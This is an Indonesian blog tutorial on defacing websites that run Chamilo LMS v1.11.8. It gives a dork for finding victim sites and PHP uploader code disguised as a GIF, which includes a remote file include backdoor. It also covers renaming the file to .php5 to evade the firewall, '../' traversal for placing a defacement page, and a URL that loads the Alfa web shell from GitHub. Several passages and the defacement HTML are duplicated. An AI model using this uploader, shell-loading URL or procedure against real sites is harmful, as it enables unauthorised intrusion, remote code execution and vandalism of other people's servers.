Azharbase.blogspot.com - hello slurr pada kali ini gw akan share cara deface poc chamilo LMS v1.11.8 kalau lain versi gak bisa ya gaes khusus versi ini saja... Oke untuk tutorial nya kalian simak aja baik-baik dan pahami dengan paham :"v
List kebutuhan deface :
- Browser (chrome,firefox,opera mini dll)
- Sinyal bagus
- Kesabaran full
Oke pada LMS ini pengguna bisa mendaftar sebagai anggota baru dan memiliki akses untuk mengupload file. Ternyata LMS chamilo ini memiliki WAF (web appliaction firewall) juga gaes tentunya sangat bagus juga, jadi untuk melakukan defacing,kita akan menggunakan uploader yang sangat sederhana tentunya, karena ketika saya upload shell seperti c99 dan b374k maka akan di block oleh si waf nya tersebut gaes.
Oke sebelum kita beraksi kita memerlukan bahan-bahan nya dulu :
Dork : intext:"powered by chamilo"
Untuk file uploadernya gunakan script dibawah ini, buat file baru > copy paste uploadernya > dan simpan dengan nama bebas dengan format file gif. Contoh nya menjadi uploader.gif.
<html>
<head>
<title>PHP File Uploader</title>
</head>
<body>
<form enctype="multipart/form-data" action="" method="POST">
<p>Upload File</p>
<input type="text" name="dir" value="" placeholder="Directory">
<input type="file" name="uploaded_file"></input><br>
<input type="submit" value="Execute"></input>
</form>
<?PHP
if(!empty($_FILES['uploaded_file'])) {
$path = $_POST['dir'];
$path = $path.basename( $_FILES['uploaded_file']['name']);
if(move_uploaded_file($_FILES['uploaded_file']['tmp_name'], $path)) {
echo "File : ".$path;
} else{
echo "There was an error uploading the file, please try again!";
}
}
if($_GET['url']) { include($_GET['url']); }
?>
</body>
</html>
Lalu kalian buat sc depes sendiri, aku sarankan jangan yang ribet dan juga tidak berat bisa juga kalian gunakan metode jso, jika pas upload script tetapi sehabis itu error (403) kurangi banyak kodingan nya, untuk yang saya pakai hanya sebesar 1kb saja gan, jika ingin di tiru silahkan kalian copy paste > simpan....
<!DOCTYPE html>
<html>
<head>
<title>Dragonor</title>
<style>
body, html { margin: 0; padding: 0;
width: 100%; height: 100%;
background: black; font-family: consolas, monospace;
}
td { padding: 10px; }
h1 { color: white; text-shadow: 0 0 10px white; }
h2 { color: yellow; }
p { color: white; }
.message {
border-left: 1px solid rgba(200, 200, 200, 0.5);
padding: 20px 10px;
}
</style>
</head>
<body>
<table width="100%" height="100%">
<tr>
<td width="30%" align="right">
<h1>#B3R0OK<br>Was Here</h1>
</td>
<td align="left">
<div class="message">
<h2>heker dragonor #b3r0ok was here</h2>
<p><i> heker #b3r0ok datang kalian bisa apa ? Kocar kacir lu !!!</i></p>
</div>
</td>
</tr>
</table>
</body>
</htm
<html>
<head>
<title>Dragonor</title>
<style>
body, html { margin: 0; padding: 0;
width: 100%; height: 100%;
background: black; font-family: consolas, monospace;
}
td { padding: 10px; }
h1 { color: white; text-shadow: 0 0 10px white; }
h2 { color: yellow; }
p { color: white; }
.message {
border-left: 1px solid rgba(200, 200, 200, 0.5);
padding: 20px 10px;
}
</style>
</head>
<body>
<table width="100%" height="100%">
<tr>
<td width="30%" align="right">
<h1>#B3R0OK<br>Was Here</h1>
</td>
<td align="left">
<div class="message">
<h2>heker dragonor #b3r0ok was here</h2>
<p><i> heker #b3r0ok datang kalian bisa apa ? Kocar kacir lu !!!</i></p>
</div>
</td>
</tr>
</table>
</body>
</htm
Itu saja yang perlu disiapkan. Untuk shell php ( raw file ) bisa didapat dari github atau di mana saja buat sendiri juga bisa, bapac kau juga bisa
Sekarang cari targetnya dengan menggunakan dork diatas. Lalu daftar dulu di LMS nya, ganti url target nya seperti contoh dibawah ini :
Sekarang cari targetnya dengan menggunakan dork diatas. Lalu daftar dulu di LMS nya, ganti url target nya seperti contoh dibawah ini :
https://target.com/chamilo/main/auth/inscription.php
Url : https://target.com
https://target.com/main/auth/inscription.php
Lalu upload file nya dengan klik tombol upload.
Upload file uploader ( File gif ) yang tadi sudah di buat. Lalu rename
filenya dan ubah formatnya menjadi php5 atau php7. Semisal nama filenya uploader.gif ubah menjadi uploader.php5.
Lokasu file nya dapat di lihat di informasi file nya:
Buka File Uploadernya, pilih file deface. File deface akan di upload di direktori yang sama denga file uploadernya. Contoh :
Url :http://target.com/app/upload/users/3/30/my_files/uploader.php5
Maka file deface dapat diakses di
http://target.com/app/upload/users/3/30/my_files/nama_script_deface.php
Isi direktori dengan "../" untuk upload ke folder sebelumnya. Jika ingin mundur 2 folder isi dengan "../../" dst. Lalu klik "Execute" untuk upload file defacenya.
-jika bingung-
Jika kalian bingung dengan cara di atas. Kalian bisa memakai shell Alfa. Tambahkan parameter pada file uploadernya. Sehingga urlnya menjadi.
Url:http://target.com/[path]/uploader.php5?url=https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/php/alfa.php
Jika kalian bingung dengan cara di atas. Kalian bisa memakai shell Alfa. Tambahkan parameter pada file uploadernya. Sehingga urlnya menjadi.
Url:http://target.com/[path]/uploader.php5?url=https://github.com/backdoorhub/shell-backdoor-list/blob/master/shell/php/alfa.php
Oke ini semua dari saya, dan saya juga capek nulis tapi ads gk ke approve mulu h3h3, curhat sedikit gan, dan jika kalian ingin bantu saya kalian bisa share tutorial ini dimana saja gratis slurr !1!!1
*saya tidak bertanggung jawab atas rusak nya website, karena saya cuma share ilmu doang*
See you next time
No comments